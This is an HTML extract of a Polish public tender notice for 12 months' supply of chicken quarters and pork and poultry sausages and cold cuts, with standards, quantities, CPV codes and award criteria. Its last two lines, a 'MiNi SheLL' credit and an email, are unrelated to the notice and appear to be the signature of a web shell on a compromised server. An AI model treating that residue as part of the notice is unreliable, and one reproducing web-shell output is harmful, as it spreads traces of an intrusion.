<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Norma	Ilość
1.	Ćwiartki z kurczaka świeże:
bez śladów zanieczyszczeń, zapach 
swoisty charakterystyczny dla danego
 asortymentu, bez oznak rozpoczynającego się psucia;		PN-A-86524	9 000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Termin płatności - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wędliny wieprzowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Norma	Ilość
1.	Kaszanka:
- wyrób podrobowy wieprzowy parzony
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;	PN-A-82007	3 700 kg
2.	Kiełbasa biała parzona:
- kiełbasa średnio rozdrobniona parzona
- skład: mięso wieprzowe min. 70%;
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;	PN-V-74028	1 800 kg
3.	Kiełbasa dębicka:
- kiełbasa średnio rozdrobniona parzona,
- skład: mięso wieprzowe min. 55%;
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-V-74028	1 800 kg
4.	Kiełbasa janowiecka:
- kiełbasa średnio rozdrobniona wieprzowo-drobiowa parzona,
- skład: mięso wieprzowe min. 55%
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-V-74028	2 200 kg
5.	Kiełbasa jarmarczna:
- kiełbasa średnio rozdrobniona wieprzowo-drobiowa wędzona, parzona,
- skład: mięso wieprzowe min. 55%, 
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;	PN-V-74028	5 600 kg
6.	Kiełbasa krakowska parzona:
- kiełbasa średnio rozdrobniona wieprzowo-drobiowa wędzona, parzona,
- skład: mięso wieprzowe min. 60%, 
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;	PN-V-74028	500 kg
7.	Mortadela:
- kiełbasa  wieprzowo-drobiowa parzona,
- skład: mięso wieprzowe min. 50%, 
- mięso drobiowe min. 10%
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-V-74028	1 600 kg
8.	Kiełbasa parówkowa:
- skład: mięso wieprzowe min. 50%;
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-V-74028	2 500 kg
9.	Kiełbasa piwna:
- kiełbasa średnio rozdrobniona wędzona, parzona,
- skład: mięso wieprzowe min. 55%, 
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;	PN-V-74028	3 500 kg
10.	Kiełbasa szynkowa wieprzowa:
- kiełbasa grubo rozdrobniona wieprzowa parzona,
- skład: mięso wieprzowe min. 55%;
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;	PN-V-74028	1 000 kg
11.	Kiełbasa śląska:
- kiełbasa średnio rozdrobniona wędzona, parzona,
- skład: mięso wieprzowe min. 55%, 
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;
	PN-V-74028	1 800 kg
12.	Kiełbasa zwyczajna:
- kiełbasa średnio rozdrobniona wieprzowo-drobiowa wędzona, parzona,
- skład: mięso wieprzowe min. 55%, 
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;
	PN-V-74028	3 000 kg
13.	Kiełbasa żywiecka:
- kiełbasa średnio rozdrobniona wędzona, parzona,
- skład: mięso wieprzowe min. 60%, 
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;
PN-V-74028	300 kg
14.	Metka:
- kiełbasa drobno rozdrobniona,
- skład: mięso wieprzowe min. 50%;
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;
PN-A-82007	2 200 kg
15.	Parówki cielęce:
- typu cielaczki
- wyrób homogenizowany
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;PN-A-82022	2 100 kg
16.	Parówki cienkie:
- skład: mięso wieprzowe min. 50%, 
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;
PN-V-74028	1 800 kg
17.	Pasztetowa wieprzowa:
- wyrób podrobowy wieprzowy parzony,
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;
PN-A-82007	3 000 kg
18.	Salceson czarny:
- wyrób podrobowy wieprzowy, parzony,
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;
PN-A-82007	1 500 kg
19.	Salceson biały:
- wyrób podrobowy wieprzowy, parzony,
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;PN-A-82007	1 500 kg
20.	Kiełbasa serdelowa:
- skład: mięso wieprzowe min. 50%;
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;PN-V-74028	2 000 kg
21.	Szynka mielona:
- kiełbasa drobno rozdrobniona,
- skład: mięso wieprzowe min. 45%;
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;PN-V-74028	3 100 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.34-3, 15.13.11.33-5, 15.13.13.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wędliny drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Norma	Ilość
1.	Baton lub blok szynkowy z indyka:
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-A-86526:1995	1 200 kg
2.	Biała drobiowa parzona:
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;	PN-A-86526:1995	800 kg
3.	Kiełbasa szynkowa z drobiu:
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;	PN-A-86526:1995	800 kg
4.	Parówki cienkie drobiowe:
- drobno rozdrobnione,
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;PN-A-86526:1995	2 300 kg
5.	Polędwica drobiowa:
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;		PN-A-86526:1995	2 300 kg
6.	Pierś gotowana z drobiu:
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;	PN-A-86526:1995	800 kg
7.	Szynka z indyka:
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;	PN-A-86526:1995	800 kg
8.	Szynka drobiowa;
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;	PN-A-86526:1995	800 kg
9.	Polędwica miodowa z drobiu:
- smak i zapach swoisty charakterystyczny dla danego asortymentu, bez oznak rozpoczynającego się psucia;	PN-A-86526:1995	1 200 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com